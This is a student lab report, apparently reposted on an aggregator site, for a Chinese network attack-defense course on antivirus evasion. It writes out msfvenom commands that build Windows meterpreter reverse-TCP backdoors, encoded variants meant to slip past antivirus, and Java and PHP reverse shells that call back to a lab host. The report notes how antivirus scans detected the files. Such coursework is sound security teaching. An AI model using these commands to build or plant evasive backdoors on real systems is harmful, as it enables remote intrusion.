当前位置: 首页 > news >正文

20232428 2025-2026-1 《网络与系统攻防技术》实验三实验报告

1.实验内容
实践内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

veil,加壳工具

使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀

如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

实验要求
掌握免杀原理与技术

回答问题

(1)杀软是如何检测出恶意代码的?

(2)免杀是做什么?

(3)免杀的基本方法有哪些?

2.实验过程
一.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
1.正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
在kali虚拟机上使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -f exe > 20232428.exe命令生成
屏幕截图 2025-10-29 160901
这个命令的作用是生成一个 Windows 系统的恶意程序,具体来说:
用msfvenom工具制作,类型是能反向连接的Meterpreter后门;
目标运行后会主动连接192.168.80.134这个 IP 的2428端口;
生成的文件名叫20232428.exe,格式是 Windows 可执行文件。
2.通过共享文件夹分享至主机文件夹中并上传至VirusTota观察结果
屏幕截图 2025-10-29 161204
3.(1)使用msf编码器多次迭代,生成exe文件
在kali中使用如下命令, msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.134 LPORT=2428 -f exe > 20232428_encoded.exe
传输到主机上检测结果如下
屏幕截图 2025-10-29 162251
多次编码后尝试,使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.80.134 LPORT=2428 -f exe > 20232428_encoded_10x.exe命令生成文件,上传检测,结果如下
屏幕截图 2025-10-29 163026
前后对比下降并不明显,说明免杀效果并不理想。
(2)生成jar格式的后门文件
使用msfvenom -p java/shell_reverse_tcp LHOST=192.168.80.134 LPORT=2428 -f jar > 20232428_java_rev.jar命令生成jar文件,上传至主机并检测
屏幕截图 2025-10-29 164250
效果明显
(3)使用msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -o 20232428_php_rev.php命令生成文件并上传
屏幕截图 2025-10-29 165233
2.使用veil,加壳工具

问题(1)第一次使用命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -f php > 20232428_php_rev.php,Kali 系统中执行msfvenom命令生成 PHP 格式的反向连接载荷时,遇到了 “invalid format: php” 的错误。这是因为msfvenom中生成 PHP 类型载荷时,格式参数并非-f php,而是需要调整命令结构。使用以下命令来生成 PHP 反向连接载荷msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.134 LPORT=2428 -o 20232428_php_rev.php这里将-f php替换为-o 20232428_php_rev.php,通过-o参数直接指定输出文件,即可生成符合要求的 PHP 反向连接脚本。

http://www.jsqmd.com/news/36803/

相关文章:

  • 详细介绍:P3375 【模板】KMP
  • 11月10号
  • 基于DP1323EL的电动车解锁方案:超高速读写,提升电动车一键解锁体验
  • 最强LLM生成代码也会出错?
  • 张量与向量
  • TCP的超时重传时间是如何计算的
  • 路径遍历漏洞实战指南:5种绕过技术与自动化测试
  • 实用指南:LLMs-from-scratch :KV 缓存
  • 前置和后置的区别
  • 2025年11月太阳能板/光伏板/电池板/单晶硅/多晶硅板前十厂家排名:深圳精益太阳能板领跑行业
  • TCP报文中的时间戳有什么作用
  • 响应式编程 - reactor 初识
  • ubuntu16.04安装CUDA驱动 - 小
  • 深入解析:统一高效图像生成与编辑!百度新加坡国立提出Query-Kontext,多项任务“反杀”专用模型
  • 2025年11月太阳能板生产厂家排名前十榜单:深圳精益太阳能板引领行业
  • reactor 初识
  • QOJ6608 Descent of Dragons
  • 2026年HR 数字化转型趋势:AI如何帮助HR从招聘到绩效全流程人效提升 48%?
  • Windows利用批处理脚本判断端口, 启动tomcat
  • 2025最新实测对比:5款热门工程项目管理系统 协同能力与实用体验深度测评
  • 2025年双轴拌馅机实力厂家权威推荐榜单:调味料拌馅机/酱菜搅拌机/翻斗式拌馅机源头厂家精选
  • 2025年终绩效,AI面谈系统让沟通效率翻倍,主管再也不用熬夜写总结
  • vue实现T型二维表格
  • antd table 列表树形结构展示
  • 2025年深圳救护车运转公司权威推荐榜单:正规救护车出租/急救车出租/出租救护车源头公司精选
  • 对隐式类型转换保持警觉
  • es中批量删除数据
  • docker安装mysql/Redis/nacos/minio/es/xxl-job
  • 低代码高价值场景:让设备管理真正成为企业数字化资产
  • re-BABYRE-攻防世界